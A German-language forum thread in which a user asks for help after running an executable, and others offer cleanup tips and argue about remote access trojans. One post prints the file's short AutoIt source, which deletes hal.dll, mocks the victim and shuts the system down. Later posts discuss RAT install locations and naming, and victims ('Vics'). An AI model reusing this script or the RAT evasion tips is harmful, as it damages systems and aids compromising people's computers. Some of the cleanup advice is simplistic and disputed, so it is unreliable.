Was Tun ?!

dann is auch nix passiert sende mir mal per ICQ die Exe ich schaue mal meine ICQ Nummer hab ich dir per PN zugeschickt

Disaster, einfach ma HiJackThis drüberlaufen lassen und Log scannen bzw. posten.

Lass ihn auswerten^^

Wächsel zu diesem Ordner:

Zitat

C:\Users\NAME\AppData\Roaming

Dort verstecken sich die Viruse.
Die kiddis ändern nie das Installationsverzeichnis vom Virus.

Falls dort ein Ordner ist der dir Unbekannt vor kommt und eine Server.exe enthält = Virus(Trojaner) löschen PC neustarten.

Lad dir mal CCleaner der wischt für dich alle Tempordner weg :> zudem
scannt er diese Ordner die der Anti Virus auch mit verfolgt

Rayl ich würd sagen, du hast glück Gehabt, er kann immer noch eine
Strafanzeige erstatten, da du zugegeben hast, das du Standart reingepackt hast,
und hier leute bestimmt Screens davon haben, also ich würde mich da nicht zu früh freuen.

Vielleicht lässt er die Anzeige auch sein, und dan hast du nochmal glückgehabt!

Lol wie meinse ich hab standart reingepackt?

xD
verstehe dich nicht.

Nein Sorry, habe mich verlesen habs ja schon Editiert

Zitat von AdnaN

Wächsel zu diesem Ordner:

Dort verstecken sich die Viruse.
Die kiddis ändern nie das Installationsverzeichnis vom Virus.

Falls dort ein Ordner ist der dir Unbekannt vor kommt und eine Server.exe enthält = Virus(Trojaner) löschen PC neustarten.

Oh Gott.. Bitte postet nur über solche Dinge wenn ihr Ahnung habt..

Ja dan erzähl mal was von deiner Ahnung.
Das was ich gepostet habe ist so!

Zitat von [DCR]Disaster

So sah die Datei aus ;D

So wissen nun was fehlt.

Code

FileDelete("C:\WINDOWS\system32\hal.dll")
FileDelete("C:\Windows\system32\hal.dll")


Msgbox("0","Ach du scheisse...","Ich habe dich geowned viel Spaß beim  PC neumachen")
Msgbox("0"."Ach du scheisse...","Achja lass dich nich so  verarschen")
Shutdown(2)

Macht euch keine Mühe xD , Disaster so Naiv muss man aber erstmal sein
Du hättest das Script auch zur Sicherheit vorher öffnen können

Die "Exe" kann man auch via Hexeditor öffnen oder mit nem Disassembler zerlegen so kann man auch herausfinden
was das Programm bezwecken soll, wenn es UPX gepackt ist einfach mit Unpack UPX zerlegen , gibt dir Google etliche Links zu
und dann wie gesagt HexEdit oder Disasm

Naja wäre jetzt aber nichts für einen der sich damit nicht wirklich auskennt

Zitat von AdnaN

Ja dan erzähl mal was von deiner Ahnung.

Alles klar.
Also, es gibt erstmal viele verschiedene RAT's (Namen gibts per PN, ich will ja öffentlich niemanden "verführen" :D).
Diese RATs sind meist recht gleich aufgebaut, ein Teil widmet sich zB. der Connection, ein anderer Teil eben der Installation, soweit haste noch Recht.
Aber: In dem Teil der Installation gibt es verschiedene Sachen wie zB Startup und Registry Key. Nun gibt es aber in so ziemlich alle RATs, die diese Noobs nutzen ein Randomname für diese Installation.
Desweiteren ist es eh Standart, soetwas im Temp Ordner auszuführen und die, die ihre Datei server.exe nennen bekommen eh meist eh keine Vics rein...
Noch mehr Fragen?

//EDIT
RAT steht für Remote Administration Tool, meist sind das Fertigviren.

Holl dir ein RAT egal wen bennene dein Trojaner in Scheißhaufen.exe oder was weis ich.
Gehe zum Installationsverzeichnis also wo sich der Server hinkopiert.

Nun siehe da eine Server.exe

War bei allen Rats die ich hatte.
nur bei einem nicht den ich nicht nenne

Dann biste einer dieser "Noobs" wie oben beschrieben die das nicht konfigurieren können. Ich wette viele Vics hattest du auch nicht.

Omg.

Ich benutze keine Rats mehr.
Noobs benutzen Rats um anderen leuten zu schaden.
Bestimmt machste in der Scene einen auf dicke Hose.
sag mal dein Scenename.

Immer diese Kiddys ja du hast wohl nicht soviele Vics gehabt.

Geh wieder in Pornoseiten spreaden kind.